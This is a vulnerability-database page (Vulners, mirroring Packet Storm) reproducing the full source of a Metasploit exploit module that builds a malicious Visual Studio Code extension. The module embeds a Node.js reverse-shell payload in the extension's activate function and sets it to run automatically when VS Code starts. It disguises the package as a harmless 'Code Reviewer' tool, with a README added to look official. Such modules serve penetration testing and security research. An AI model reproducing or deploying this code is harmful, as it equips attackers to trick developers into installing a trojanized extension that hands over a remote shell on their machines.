Vulners
Lucene search
Visual Studio Code Execution
🗓️ 23 Apr 2024 00:00:00Reported by h00die, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 565 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Visual Studio vsix Extension Exec',
'Description' => %q{
Creates a vsix file which can be installed in Visual Studio Code as an extension.
At activation/install, the extension will execute a shell or two.
Tested against VSCode 1.87.2 on Ubuntu 22.04
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # Metasploit module
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => false,
'FILENAME' => 'extension.vsix',
'WfsDelay' => 3_600, # 1hr
'payload' => 'nodejs/shell_reverse_tcp' # cross platform
},
'Platform' => 'nodejs',
'Arch' => ARCH_NODEJS,
'Targets' => [
['Automatic', {}],
],
'References' => [
['URL', 'https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1'], # similar idea
['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
['URL', 'https://code.visualstudio.com/api/references/activation-events'] # onStartup Action
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
},
'Privileged' => false,
'DisclosureDate' => '2024-03-22' # date of development
)
)
register_options([
OptString.new('NAME', [true, 'The name of the extension', 'Code Reviewer']),
OptString.new('DESCRIPTION', [true, 'The description of the extension', 'Reviews code']),
OptString.new('VERSION', [true, 'The version of the extension', '0.0.1']),
OptString.new('README', [false, 'The readme contents for the extension', '']),
])
end
def name
datastore['NAME']
end
def description
datastore['DESCRIPTION']
end
def version
datastore['VERSION']
end
def readme
datastore['README']
end
def manifest
%(<?xml version="1.0" encoding="utf-8"?>
<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
<Metadata>
<Identity Language="en-US" Id="extension-name-fillmein" Version="#{version}" Publisher="#{Rex::Text.rand_text_alpha(10)}" />
<DisplayName>#{name}</DisplayName>
<Description xml:space="preserve">#{description}</Description>
<Tags></Tags>
<GalleryFlags>Public</GalleryFlags>
<Properties>
<Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.60.0" />
<Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" />
<Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" />
<Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" />
<Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" />
<Property Id="Microsoft.VisualStudio.Services.GitHubFlavoredMarkdown" Value="true" />
<Property Id="Microsoft.VisualStudio.Services.Content.Pricing" Value="Free"/>
</Properties>
</Metadata>
<Installation>
<InstallationTarget Id="Microsoft.VisualStudio.Code"/>
</Installation>
<Dependencies/>
<Assets>
<Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" />
</Assets>
</PackageManifest>)
end
def extension_js
%|const vscode = require('vscode');
function activate(context) {
#{payload.encoded}
}
function deactivate() {}
module.exports = {
activate,
deactivate
}
|
end
def package_json
%({
"name": "#{name.gsub(' ', '.')}",
"displayName": "#{name}",
"description": "#{description}",
"version": "#{version}",
"publisher":"#{Rex::Text.rand_name}",
"engines": {
"vscode": "^1.60.0"
},
"activationEvents": ["onStartupFinished"],
"main": "./extension.js",
"devDependencies": {
"@types/vscode": "^1.60.0"
}
}
)
end
def exploit
# Create malicious vsix (zip archive) containing our exploit
files =
[
{ data: manifest, fname: 'extension.vsixmanifest' },
{ data: extension_js, fname: 'extension/extension.js' },
{ data: package_json, fname: 'extension/package.json' },
{ data: readme, fname: 'extension/README.md' }, # not required, but looks a little more official
]
zip = Msf::Util::EXE.to_zip(files)
file_create(zip)
print_status('Waiting for shell')
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4